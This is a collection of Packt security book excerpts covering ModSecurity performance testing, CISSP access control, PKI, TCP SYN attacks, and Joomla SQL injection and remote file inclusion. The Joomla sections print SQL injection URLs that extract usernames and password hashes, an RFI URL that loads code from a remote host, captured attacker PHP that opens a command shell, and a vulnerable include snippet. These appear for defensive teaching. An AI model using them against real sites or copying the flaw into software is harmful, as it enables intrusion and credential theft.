contains a file named modsecurity_crs_10_config.conf. This file contains some of the basic configuration directives needed to turn on the rule engine and configure request and response body access. Since we have already configured these directives, we do not want this file to conflict with our existing configuration, and so we need to disable this. To do this, we simply need to rename the file so that it has a different extension as Apache only loads *.conf files with the Include directive we used above: $ mv modsecurity_crs_10_config.conf modsecurity_crs_10_config.conf.disabled Once we have restarted Apache, we can test that the core ruleset is loaded by attempting to access an URL that it should block. For example, try surfing to http://yourserver/ftp.exe and you should get the error message Method Not Implemented, ensuring that the core rules are loaded. Performance testing basics So what effect does loading the core ruleset have on web application response time and how do we measure this? We could measure the response time for a single request with and without the core ruleset loaded, but this wouldn't have any statistical significance—it could happen that just as one of the requests was being processed, the server started to execute a processor-intensive scheduled task, causing a delayed response time. The best way to compare the response times is to issue a large number of requests and look at the average time it takes for the server to respond. An excellent tool—and the one we are going to use to benchmark the server in the following tests—is called httperf. Written by David Mosberger of Hewlett Packard Research Labs, httperf allows you to simulate high workloads against a web server and obtain statistical data on the performance of the server. You can obtain the program at http://www.hpl.hp.com/research/linux/httperf/ where you'll also find a useful manual page in the PDF file format and a link to the research paper published together with the first version of the tool. Using httperf We'll run httperf with the options --hog (use as many TCP ports as needed), --uri/index.html (request the static web page index.html) and we'll use --num-conn 1000 (initiate a total of 1000 connections). We will be varying the number of requests per second (specified using --rate) to see how the server responds under different workloads. This is what the typical output from httperf looks like when run with the above options: $ ./httperf --hog --server=bytelayer.com --uri /index.html --num-conn1000 --rate 50Total: connections 1000 requests 1000 replies 1000 test-duration20.386 sConnection rate: 49.1 conn/s (20.4 ms/conn, <=30 concurrentconnections)Connection time [ms]: min 404.1 avg 408.2 max 591.3 median 404.5stddev 16.9Connection time [ms]: connect 102.3Connection length [replies/conn]: 1.000Request rate: 49.1 req/s (20.4 ms/req)Request size [B]: 95.0Reply rate [replies/s]: min 46.0 avg 49.0 max 50.0 stddev 2.0 (4samples)Reply time [ms]: response 103.1 transfer 202.9Reply size [B]: header 244.0 content 19531.0 footer 0.0 (total19775.0)Reply status: 1xx=0 2xx=1000 3xx=0 4xx=0 5xx=0CPU time [s]: user 2.37 system 17.14 (user 11.6% system 84.1% total95.7%)Net I/O: 951.9 KB/s (7.8*10^6 bps)Errors: total 0 client-timo 0 socket-timo 0 connrefused 0 connreset 0Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0 The output shows us the number of TCP connections httperf initiated per second ("Connection rate"), the rate at which it requested files from the server ("Request rate"), and the actual reply rate that the server was able to provide ("Reply rate"). We also get statistics on the reply time—the "reply time – response" is the time taken from when the first byte of the request was sent to the server to when the first byte of the reply was received—in this case around 103 milliseconds. The transfer time is the time to receive the entire response from the server. The page we will be requesting in this case, index.html, is 20 KB in size which is a pretty average size for an HTML document. httperf requests the page one time per connection and doesn't follow any links in the page to download additional embedded content or script files, so the number of such links in the page is of no relevance to our test. Getting a baseline: Testing without ModSecurity When running benchmarking tests like this one, it's always important to get a baseline result so that you know the performance of your server when the component you're measuring is not involved. In our case, we will run the tests against the server when ModSecurity is disabled. This will allow us to tell which impact, if any, running with ModSecurity enabled has on the server. Response time The following chart shows the response time, in milliseconds, of the server when it is running without ModSecurity. The number of requests per second is on the horizontal axis: As we can see, the server consistently delivers response times of around 300 milliseconds until we reach about 75 requests per second. Above this, the response time starts increasing, and at around 500 requests per second the response time is almost a second per request. This data is what we will use for comparison purposes when looking at the response time of the server after we enable ModSecurity. Memory usage Finding the memory usage on a Linux system can be quite tricky. Simply running the Linux top utility and looking at the amount of free memory doesn't quite cut it, and the reason is that Linux tries to use almost all free memory as a disk cache. So even on a system with several gigabytes of memory and no memory-hungry processes, you might see a free memory count of only 50 MB or so. Another problem is that Apache uses many child processes, and to accurately measure the memory usage of Apache we need to sum the memory usage of each child process. What we need is a way to measure the memory usage of all the Apache child processes so that we can see how much memory the web server truly uses. To solve this, here is a small shell script that I have written that runs the ps command to find all the Apache processes. It then passes the PID of each Apache process to pmap to find the memory usage, and finally uses awk to extract the memory usage (in KB) for summation. The result is that the memory usage of Apache is printed to the terminal. The actual shell command is only one long line, but I've put it into a file called apache_mem.sh to make it easier to use: #!/bin/sh# apache_mem.sh# Calculate the Apache memory usageps -ef | grep httpd | grep ^apache | awk '{ print $2 }' | xargs pmap -x | grep 'total kB' | awk '{ print $3 }' | awk '{ sum += $1 } END { print sum }' Now, let's use this script to look at the memory usage of all of the Apache processes while we are running our performance test. The following graph shows the memory usage of Apache as the number of requests per second increases: Apache starts out consuming about 300 MB of memory. Memory usage grows steadily and at about 150 requests per second it starts climbing more rapidly. At 500 requests per second, the memory usage is over 2.4 GB—more than the amount of physical RAM of the server. The fact that this is possible is because of the virtual memory architecture that Linux (and all modern operating systems) use. When there is no more physical RAM available, the kernel starts swapping memory pages out to disk, which allows it to continue operating. However, since reading and writing to a hard drive is much slower than to memory, this starts slowing down the server significantly, as evidenced by the increase in response time seen in the previous graph. CPU usage In both of the tests above, the server's CPU usage was consistently around 1 to 2%, no matter what the request rate was. You might have expected a graph of CPU usage in the previous and subsequent tests, but while I measured the CPU usage in each test, it turned out to run at this low utilization rate for all tests, so a graph would not be very useful. Suffice it to say that in these tests, CPU usage was not a factor. ModSecurity without any loaded rules Now, let's enable ModSecurity—but without loading any rules—and see what happens to the response time and memory usage. Both SecRequestBodyAccess and SecResponseBodyAccess were set to On, so if there is any performance penalty associated with buffering requests and responses, we should see this now that we are running ModSecurity without any rules. The following graph shows the response time of Apache with ModSecurity enabled: We can see that the response time graph looks very similar to the response time graph we got when ModSecurity was disabled. The response time starts increasing at around 75 requests per second, and once we pass 350 requests per second, things really start going downhill. The memory usage graph is also almost identical to the previous one: Apache uses around 1.3 MB extra per child process when ModSecurity is loaded, which equals a total increase of memory usage of 26 MB for this particular setup. Compared to the total amount of memory Apache uses when the server is idle (around 300 MB) this equals an increase of about 10%. Mod Security with the core ruleset loaded Now for the really interesting test we'll run httperf against ModSecurity with the core ruleset loaded and look at what that does to the response time and memory usage. Response time The following graph shows the server response time with the core ruleset loaded: At first, the response time is around 340 ms, which is about 35 ms slower than in previous tests. Once the request rate gets above 50, the server response time starts deteriorating. As the request rates grows, the response time gets worse and worse, reaching a full 5 seconds at 100 requests per second. I have capped the graph at 100 requests per second, as the server performance has already deteriorated enough at this point to allow us to see the trend. We see that the point at which memory usage starts increasing has gone down from 75 to 50 requests per second now that we have enabled the core ruleset. This equals a reduction in the maximum number of requests per second the server can handle of 33%.
Read more
  • 0
  • 0
  • 11479

article-image-cissp-security-measures-access-control
Packt
27 Nov 2009
4 min read
Save for later

CISSP: Security Measures for Access Control

Packt
27 Nov 2009
4 min read
Knowledge requirements A candidate appearing for the CISSP exam should have knowledge in the following areas that relate to access control: Control access by applying concepts, methodologies, and techniques Identify, evaluate, and respond to access control attacks such as Brute force attack, dictionary, spoofing, denial of service, etc. Design, coordinate, and evaluate penetration test(s) Design, coordinate, and evaluate vulnerability test(s) The approach In accordance with the knowledge expected in the CISSP exam, this domain is broadly grouped under five sections as shown in the following diagram: Section 1: The Access Control domain consists of many concepts, methodologies, and some specific techniques that are used as best practices. This section coverssome of the basic concepts, access control models, and a few examples of access control techniques. Section 2: Authentication processes are critical for controlling access to facilities and systems. This section looks into important concepts that establish the relationship between access control mechanisms and authentication processes. Section 3: A system or facility becomes compromised primarily through unauthorized access either through the front door or the back door. We'll see some of the common and popular attacks on access control mechanisms, and also learn about the prevalent countermeasures to such attacks. Section 4: An IT system consists of an operating system software, applications, and embedded software in the devices to name a few. Vulnerabilities in such software are nothing but holes or errors. In this section we see some of the common vulnerabilities in IT systems, vulnerability assessment techniques, and vulnerability management principles. Section 5: Vulnerabilities are exploitable, in the sense that the IT systems can be compromised and unauthorized access can be gained by exploiting the vulnerabilities. Penetration testing or ethical hacking is an activity that tests the exploitability of vulnerabilities for gaining unauthorized access to an IT system. Today, we'll quickly review some of the important concepts in the Sections 1, 2,and 3. Access control concepts, methodologies, and techniques Controlling access to the information systems and the information processing facilities by means of administrative, physical, and technical safeguards is the primary goal of access control domain. Following topics provide insight into someof the important access control related concepts, methodologies, and techniques. Basic concepts One of the primary concepts in access control is to understand the subject and the object. A subject may be a person, a process, or a technology component that either seeks access or controls the access. For example, an employee trying to access his business email account is a subject. Similarly, the system that verifies the credentials such as username and password is also termed as a subject. An object can be a file, data, physical equipment, or premises which need controlled access. For example, the email stored in the mailbox is an object that a subject is trying to access. Controlling access to an object by a subject is the core requirement of an access control process and its associated mechanisms. In a nutshell, a subject either seeks or controls access to an object. An access control mechanism can be classified broadly into the following two types: If access to an object is controlled based on certain contextual parameters, such as location, time, sequence of responses, access history, and so on, then it is known as a context-dependent access control. In this type of control, the value of the asset being accessed is not a primary consideration. Providing the username and password combination followed by a challenge and response mechanism such as CAPTCHA, filtering the access based on MAC adresses in wireless connections, or a firewall filtering the data based on packet analysis are all examples of context-dependent access control mechanisms. Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a challenge-response test to ensure that the input to an access control system is supplied by humans and not by machines. This mechanism is predominantly used by web sites to prevent Web Robots(WebBots) to access the controlled section of the web site by brute force methods The following is an example of CAPTCHA: If the access is provided based on the attributes or content of an object,then it is known as a content-dependent access control. In this type of control, the value and attributes of the content that is being accessed determines the control requirements. For example, hiding or showing menus in an application, views in databases, and access to confidential information are all content-dependent.
Read more
  • 0
  • 0
  • 8347

article-image-public-key-infrastructure-pki-and-other-concepts-cryptography-cissp-exam
Packt
28 Oct 2009
10 min read
Save for later

Public Key Infrastructure (PKI) and other Concepts in Cryptography for CISSP Exam

Packt
28 Oct 2009
10 min read
Public key infrastructure Public Key Infrastructure (PKI) is a framework that enables integration of various services that are related to cryptography. The aim of PKI is to provide confidentiality, integrity, access control, authentication, and most importantly, non-repudiation. Non-repudiation is a concept, or a way, to ensure that the sender or receiver of a message cannot deny either sending or receiving such a message in future. One of the important audit checks for non-repudiation is a time stamp. The time stamp is an audit trail that provides information of the time the message is sent by the sender and the time the message is received by the receiver. Encryption and decryption, digital signature, and key exchange are the three primary functions of a PKI. RSS and elliptic curve algorithms provide all of the three primary functions: encryption and decryption, digital signatures, and key exchanges. Diffie-Hellmen algorithm supports key exchanges, while Digital Signature Standard (DSS) is used in digital signatures. Public Key Encryption is the encryption methodology used in PKI and was initially proposed by Diffie and Hellman in 1976. The algorithm is based on mathematical functions and uses asymmetric cryptography, that is, uses a pair of keys. The image above represents a simple document-signing function. In PKI, every user will have two keys known as "pair of keys". One key is known as a private key and the other is known as a public key. The private key is never revealed and is kept with the owner, and the public key is accessible by every one and is stored in a key repository. A key can be used to encrypt as well as to decrypt a message. Most importantly, a message that is encrypted with a private key can only be decrypted with a corresponding public key. Similarly, a message that is encrypted with a public key can only be decrypted with the corresponding private key. In the example image above, Bob wants to send a confidential document to Alice electronically. Bob has four issues to address before this electronic transmission can occur: Ensuring the contents of the document are encrypted such that the document is kept confidential. Ensuring the document is not altered during transmission. Since Alice does not know Bob, he has to somehow prove that the document is indeed sent by him. Ensuring Alice receives the document and that she cannot deny receiving it in future. PKI supports all the above four requirements with methods such as secure messaging, message digests, digital signatures, and non-repudiation services. Secure messaging To ensure that the document is protected from eavesdropping and not altered during the transmission, Bob will first encrypt the document using Alice's public key. This ensures two things: one, that the document is encrypted, and two, only Alice can open it as the document requires the private key of Alice to open it. To summarize, encryption is accomplished using the public key of the receiver and the receiver decrypts with his or her private key. In this method, Bob could ensure that the document is encrypted and only the intended receiver (Alice) can open it. However, Bob cannot ensure whether the contents are altered (Integrity) during transmission by document encryption alone. Message digest In order to ensure that the document is not altered during transmission, Bob performs a hash function on the document. The hash value is a computational value based on the contents of the document. This hash value is known as the message digest. By performing the same hash function on the decrypted document the message, the digest can be obtained by Alice and she can compare it with the one sent by Bob to ensure that the contents are not altered. This process will ensure the integrity requirement. Digital signature In order to prove that the document is sent by Bob to Alice, Bob needs to use a digital signature. Using a digital signature means applying the sender's private key to the message, or document, or to the message digest. This process is known as as signing. Only by using the sender's public key can the message be decrypted. Bob will encrypt the message digest with his private key to create a digital signature. In the scenario illustrated in the image above, Bob will encrypt the document using Alice's public key and sign it using his digital signature. This ensures that Alice can verify that the document is sent by Bob, by verifying the digital signature (Bob's private key) using Bob's public key. Remember a private key and the corresponding public key are linked, albeit mathematically. Alice can also verify that the document is not altered by validating the message digest, and also can open the encrypted document using her private key. Message authentication is an authenticity verification procedure that facilitates the verification of the integrity of the message as well as the authenticity of the source from which the message is received. Digital certificate By digitally signing the document, Bob has assured that the document is sent by him to Alice. However, he has not yet proved that he is Bob. To prove this, Bob needs to use a digital certificate. A digital certificate is an electronic identity issued to a person, system, or an organization by a competent authority after verifying the credentials of the entity. A digital certificate is a public key that is unique for each entity. A certification authority issues digital certificates. In PKI, digital certificates are used for authenticity verification of an entity. An entity can be an individual, system, or an organization. An organization that is involved in issuing, distributing, and revoking digital certificates is known as a Certification Authority (CA). A CA acts as a notary by verifying an entity's identity. One of the important PKI standards pertaining to digital certificates is X.509. It is a standard published by the International Telecommunication Union (ITU) that specifies the standard format for digital certificates. PKI also provides key exchange functionality that facilitates the secure exchange of public keys such that the authenticity of the parties can be verified. Key management procedures Key management consists of four essential procedures concerning public and private keys. They are as follows: Secure generation of keys—Ensures that private and public keys are generated in a secure manner. Secure storage of keys—Ensures that keys are stored securely. Secure distribution of keys—Ensures that keys are not lost or modified during distribution. Secure destruction of keys—Ensures that keys are destroyed completely once the useful life of the key is over. Type of keys NIST Special Publication 800-57 titled Recommendation for Key Management - Part 1: General specifies the following nineteen types of keys: Private signature key—It is a private key of public key pairs and is used to generate digital signatures. It is also used to provide authentication, integrity, and non-repudiation. Public signature verification key—It is the public key of the asymmetric (public) key pair. It is used to verify the digital signature. Symmetric authentication key—It is used with symmetric key algorithms to provide assurance of the integrity and source of the messages. Private authentication key—It is the private key of the asymmetric (public) key pair. It is used to provide assurance of the integrity of information. Public authentication key—Public key of an asymmetric (public) pair that is used to determine the integrity of information and to authenticate the identity of entities. Symmetric data encryption key—It is used to apply confidentiality protection to information. Symmetric key wrapping key—It is a key-encryptin key that is used to encrypt the other symmetric keys. Symmetric and asymmetric random number generation keys—They are used to generate random numbers. Symmetric master key—It is a master key that is used to derive other symmetric keys. Private key transport key—They are the private keys of asymmetric (public) key pairs, which are used to decrypt keys that have been encrypted with the associated public key. Public key transport key—They are the public keys of asymmetric (public) key pairs that are used to decrypt keys that have been encrypted with the associated public key. Symmetric agreement key—It is used to establish keys such as key wrapping keys and data encryption keys using a symmetric key agreement algorithm. Private static key agreement key—It is a private key of asymmetric (public) key pairs that is used to establish keys such as key wrapping keys and data encryption keys. Public static key agreement key— It is a public key of asymmetric (public) key pairs that is used to establish keys such as key wrapping keys and data encryption keys. Private ephemeral key agreement key—It is a private key of asymmetric (public) key pairs used only once to establish one or more keys such as key wrapping keys and data encryption keys. Public ephemeral key agreement key—It is a public key of asymmetric (public) key pairs that is used in a single key establishment transaction to establish one or more keys. Symmetric authorization key—This key is used to provide privileges to an entity using symmetric cryptographic method. Private authorization key—It is a private key of an asymmetric (public) key pair that is used to provide privileges to an entity. Public authorization key—It is a public key of an asymmetric (public) key pair that is used to verify privileges for an entity that knows the associated private authorization key.   Key management best practices Key Usage refers to using a key for a cryptographic process, and should be limited to using a single key for only one cryptographic process. This is to ensure that the strength of the security provided by the key is not weakened. When a specific key is authorized for use by legitimate entities for a period of time, or the effect of a specific key for a given system is for a specific period, then the time span is known as a cryptoperiod. The purpose of defining a cryptoperiod is to limit a successful cryptanalysis by a malicious entity. Cryptanalysis is the science of analyzing and deciphering code and ciphers. The following assurance requirements are part of the key management process: Integrity protection—Assuring the source and format of the keying material by verification Domain parameter validity—Assuring parameters used by some public key algorithms during the generation of key pairs and digital signatures, and the generation of shared secrets that are subsequently used to derive keying material Public key validity—Assuring that the public key is arithmetically correct Private key possession—Assuring that the possession of the private key is obtained before using the public key Cryptographic algorithm and key size selection are the two important key management parameters that provide adequate protection to the system and the data throughout their expected lifetime. Key states A cryptographic key goes through different states from its generation to destruction. These states are defined as key states. The movement of a cryptographic key from one state to another is known as a key transition. NIST SP800-57 defines the following six key states: Pre-activation state—The key has been generated, but not yet authorized for use Active state—The key may used to cryptographically protect information Deactivated state—The cryptoperiod of the key is expired, but the key is still needed to perform cryptographic operations Destroyed state—The key is destroyed Compromised state—The key is released or determined by an unauthorized entity Destroyed compromised state—The key is destroyed after a compromise or the comprise is found after the key is destroyed
Read more
  • 0
  • 0
  • 13739
article-image-telecommunications-and-network-security-concepts-cissp-exam
Packt
28 Oct 2009
5 min read
Save for later

Telecommunications and Network Security Concepts for CISSP Exam

Packt
28 Oct 2009
5 min read
Transport layer The transport layer in the TCP/IP model does two things: it packages the data given out by applications to a format that is suitable for transport over the network, and it unpacks the data received from the network to a format suitable for applications. The process of packaging the data packets received from the applications is known as encapsulation. The output of such a process is known as datagram. Similarly, the process of unpacking the datagram received from the network is known as abstraction A transport section in a protocol stack carries the information that is in the form of datagrams, Frames and Bits. Transport layer protocols There are many transport layer protocols that carry the transport layer functions. The most important ones are: Transmission Control Protocol (TCP): It is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. User Datagram Protocol (UDP): This protocol is similar to TCP, but is connectionless. A connection-oriented protocol is a protocol that guarantees delivery of datagram (packets) to the destination application by way of a suitable mechanism. For example, a three-way handshake syn, syn-ack, ack in TCP. The reliability of datagram delivery of such protocol is high. A protocol that does not guarantee the delivery of datagram, or packets, to the destination is known as connectionless protocol. These protocols use only one-way communication. The speed of the datagram's delivery by such protocols is high. Other transport layer protocols are as follows: Sequenced Packet eXchange (SPX): SPX is a part of the IPX/SPX protocol suit and used in Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol. Stream Control Transmission Protocol (SCTP): It is a connection-oriented protocol similar to TCP, but provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems. Appletalk Transaction Protocol (ATP): It is a proprietary protocol developed for Apple Macintosh computers. Datagram Congestion Control Protocol (DCCP): As the name implies, it is a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network. Fiber Channel Protocol (FCP): This protocol is used in high-speed networking such as Gigabit networking. One of its prominent applications is Storage Area Network (SAN). SAN is network architecture that's used for attaching remote storage devices such as tape drives, disk arrays, and so on to the local server. This facilitates the use of storage devices as if they were local devices. In the following sections we'll review the most important protocols—TCP and UDP. Transmission Control Protocol (TCP) TCP is a connection-oriented protocol that is widely used in Internet communications. As the name implies, a protocol has two primary functions. The primary function of TCP is the transmission of datagram between applications, while the secondary function is related to controls that are necessary for ensuring reliable transmissions. Protocol / Service Transmission Control Protocol (TCP) Layer(s) TCP works in the transport layer of the TCP/IP model Applications Applications where the delivery needs to be assured such as email, World Wide Web (WWW), file transfer, and so on use TCP for transmission Threats Service disruption Vulnerabilities Half-open connections Attacks Denial-of- service attacks such as TCP SYN attacks Connection hijacking such as IP Spoofing attacks Countermeasures Syn cookies Cryptographic solutions   A half-open connection is a vulnerability in TCP implementation. TCP uses a three-way handshake to establish or terminate connections. Refer to the following illustration: In a three-way handshake, first the client (workstation) sends a request to the server (www.some_website.com). This is known as an SYN request. The server acknowledges the request by sending SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery. If the client does not send the final ACK, then the connection is known as half-open. Since the server has created a buffer for that connection, certain amounts of memory or server resources are consumed. If thousands of such half-open connections are created maliciously, the server resources may be completely consumed resulting in a denial-of-service to legitimate requests. TCP SYN attacks are technically establishing thousands of half-open connections to consume the server resources. Two actions can be taken by an attacker. The attacker, or malicious software, will send thousands of SYN to the server and withhold the ACK. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, in a span of time the entire resources will be consumed. This will result in a denial-of-service. If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing. SYN attacks, such as SYN flooding and SYN spoofing, can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. The server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, which it sends as SYN-ACK. When the server receives an ACK, it checks the details and creates the connection. A cookie is a piece of information, usually in a form of text file, sent by the server to client. Cookies are generally stored on a client's computer and are used for purposes such as authentication, session tracking, and management. User Datagram Protocol (UDP) UDP is a connectionless protocol similar to TCP. However, UDP does not provide delivery guarantee of data packets.  
Read more
  • 0
  • 0
  • 3539

article-image-preventing-sql-injection-attacks-your-joomla-websites
Packt
23 Oct 2009
6 min read
Save for later

Preventing SQL Injection Attacks on your Joomla Websites

Packt
23 Oct 2009
6 min read
Introduction Mark Twain once said, "There are only two certainties in life-death and taxes." Even in web security there are two certainties: It's not "if you are attacked", but "when and how" your site will be taken advantage of. There are several types of attacks that your Joomla! site may be vulnerable to such as CSRF, Buffer Overflows, Blind SQL Injection, Denial of Service, and others that are yet to be found. The top issues in PHP-based websites are: Incorrect or invalid (intentional or unintentional) input Access control vulnerabilities Session hijacks and attempts on session IDs SQL Injection and Blind SQL Injection Incorrect or ignored PHP configuration settings Divulging too much in error messages and poor error handling Cross Site Scripting (XSS) Cross Site Request Forgery, that is CSRF (one-click attack) SQL Injections SQL databases are the heart of Joomla! CMS. The database holds the content, the users' IDs, the settings, and more. To gain access to this valuable resource is the ultimate prize of the hacker. Accessing this can gain him/her an administrative access that can gather private information such as usernames and passwords, and can allow any number of bad things to happen. When you make a request of a page on Joomla!, it forms a "query" or a question for the database. The database is unsuspecting that you may be asking a malformed question and will attempt to process whatever the query is. Often, the developers do not construct their code to watch for this type of an attack. In fact, in the month of February 2008, twenty-one new SQL Injection vulnerabilities were discovered in the Joomla! land. The following are some examples presented for your edification. Using any of these for any purpose is solely your responsibility and not mine: Example 1 index.php?option=com_****&Itemid=name&cmd=section&section=-  000/**/union+select/**/000,111,222,      concat(username,0x3a,password),0,     concat(username,0x3a,password)/**/from/**/jos_users/* Example 2 index.php?option=com_****&task=****&Itemid=name&catid=97&aid=- 9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/ concat(username,0x3a,password),0x3a,password, 0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/ from/**/jos_users/* Both of these will reveal, under the right set of circumstances, the usernames and passwords in your system. There is a measure of protection in Joomla! 1.0.13, with an encryption scheme that will render the passwords useless. However, it does not make sense to allow extensions that are vulnerable to remain. Yielding ANY kind of information like this is unacceptable. The following screenshot displays the results of the second example running on a test system with the vulnerable extension. The two pieces of information are the username that is listed as Author, and the Hex string (partially blurred) that is the hashed password: You can see that not all MD5 hashes can be broken easily. Though it won't be shown here, there is a website available where you enter your hash and it attempts to crack it. It supports several popular hashes. When I entered this hash (of a password) into the tool, I found the password to be Anthony. It's worth noting that this hash and its password are a result of a website getting broken into, prompting the user to search for the "hash" left behind, thus yielding the password. The important news, however, is that if you are using Joomla! 1.0.13 or greater, the password's hash is now calculated with a "salt", making it nearly impossible to break. However, the standard MD5 could still be broken with enough effort in many cases. For more information about salting and MD5 see:http://www.php.net/md5. For an interesting read on salting, you may wish to read this link:www.governmentsecurity.org/forum/lofiversion/index.php/t19179.htm SQL Injection is a query put to an SQL database where data input was expected AND the application does not correctly filter the input. It allows hijacking of database information such as usernames and passwords, as we saw in the earlier example. Most of these attacks are based on two things. First, the developers have coding errors in their code, or they potentially reused the code from another application, thus spreading the error. The other issue is the inadequate validation of input. In essence, it means trusting the users to put in the RIGHT stuff, and not put in queries meant to harm the system. User input is rarely to be trusted for this reason. It should always be checked for proper format, length, and range. There are many ways to test for vulnerability to an SQL Injection, but one of the most common ones is as follows: In some cases, this may be enough to trigger a database to divulge details. This very simplistic example would not work in the login box that is shown. However, if it were presented to a vulnerable extension in a manner such as the following it might work: <FORM action=http://www.vulnerablesite.com/Search.php method=post><input type=hidden name=A value="me' or 1=1--"></FORM> This "posting" method (presented as a very generic exploit and not meant to work per se in Joomla!) will attempt to break into the database by putting forward queries that would not necessarily be noticed. But why 1=1- - ? According to PHP.NET, "It is a common technique to force the SQL parser to ignore the rest of the query written by the developer with-- which is the comment sign in SQL." You might be thinking, "So what if my passwords are hashed? They can get them but they cannot break them!" This is true, but if they wanted it badly, nothing keeps them from doing something such as this: INSERT INTO jos_mydb_users  ('email','password','login_id','full_name')  VALUES ('johndoe@email.com','default','Jdoe','John Doe');--'; This code has a potential if inserted into a query such as this: http://www.yourdomain/vulnerable_extension//index.php?option=com_vulext INSERT INTO jos_mydb_users ('email','password','login_id','full_name') VALUES ('johndoe@email.com','default','Jdoe','John Doe');--'; Again, this is a completely bogus example and is not likely to work. But if you can get an SQL DB to divulge its information, you can get it to "accept" (insert) information it should not as well. 
Read more
  • 0
  • 0
  • 5899

article-image-preventing-remote-file-includes-attack-your-joomla-websites
Packt
15 Oct 2009
7 min read
Save for later

Preventing Remote File Includes Attack on your Joomla Websites

Packt
15 Oct 2009
7 min read
PHP is an open-source server-side scripting language. It is the basis of many web applications. It works very nicely with database platforms such as Joomla!. Since Joomla! is growing, and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible. In my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has some glaring holes, it won't be useable. The administrators and site development folks have the next layer of responsibility to ensure that they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two are combined and executed properly, they will result in secure web transactions. The SQL Injections, though very nasty, can be prevented in many cases; but a RFI attack is a more difficult one to stop altogether. So, it is important that you are aware of them and know their signs. Remote File Includes An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that File Inclusion attacks, such as these, can mostly be mitigated by turning Register_Globals off.Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion. The following is a sanitized attempt to attack a server in just such a manner: http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? If the site in this example did not have appropriate safeguards in place, the following code would be executed: $x0b="inx72_147x65x74"; $x0c="184rx74o154x6fwex72"; echo "c162141156kx5fr157cx6bs";if (@$x0b("222x61x33e_x6d144e") or $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e"){ echo "345a146x65155od145x3ao156";}else{echo "345a146ex6dox64e:x6ffx66";}exit(); ?> This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it to be executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another: {echo "345a146x65155od145x3ao156";}else{ echo "345a146ex6dox64e:x6ffx66";}exit(); Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL: <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C><H1>Changing this CMD will result in corrupt scanning !</H1></html></head></body><?phpif((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{ini_restore("safe_mode");ini_restore("open_basedir");if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{echo("Safe Mode of this Server is : ");echo("SafemodeON");}}...@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}exit; This sanitized example wants to learn if we are running SAFE MODE on or off, and then would attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a Command Shell is equivalent to running START | RUN | CMD, thus opening what we would call a "DOS prompt". Other methods of attack include the following: Evil code uploaded through session files, or through image uploads is a way of attacking. Another method of attack is the insertion or placement of code that you might think would be safe, such as compressed audio streams. These do not get inspected as they should be, and could allow access to remote resources. It is noteworthy that this can slip past even if you have set the allow_url_fopen or allow_url_include to disabled. A common method is to take input from the request POST data versus a data file. There are several other methods beyond this list. And just judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for robust security architecture, and to be very careful in accepting the user input on our websites. The Most Basic Attempt You don't always need a heavy or fancy code as in the earlier examples. Just appending a page request of sorts to the end of our URL will do it. Remember this? /?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? Here we're instructing the server to force our path to change in our environment to match the code located out there. Here is such a "shell": <?php$file =$_GET['evil-page'];include($file .".php");?> What Can We Do to Stop This? As stated repeatedly, in-depth defense is the most important of design considerations. Putting up many layers of defense will enable you to withstand the attacks. This type of attack can be defended against at the .htaccess level and by filtering the inputs. One problem is that we tend to forget that many defaults in PHP set up a condition for failure. Take this for instance: allow_url_fopen is on by default. "Default? Why do you care?" you may ask. This, if enabled, allows the PHP file functions such as file_get_contents(), and the ever present include and require statements to work in a manner you may not have anticipated, such as retrieving the entire contents of your website, or allowing a determined attacker to break in. Since programmers sometimes forget to do proper input filtering in their user fields, such as an input box that allows any type of data to be inputted, or code to be inserted for an injection attack. Lots of site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part, and not disabling the allow_url_fopen option. This leads to code injections as in our previous examples. Make sure you keep the Global Registers OFF. This is a biggie that will prevent much evil! There are a few ways to do this and depending on your version of Joomla!, they are handled differently. In Joomla! versions less than 1.0.13, look for this code in the globals.php // no direct accessdefined( '_VALID_MOS' ) or die( 'Restricted access' );/* * Use 1 to emulate register_globals = on * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED * * Use 0 to emulate register_globals = off * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS */define( 'RG_EMULATION', 0 ); 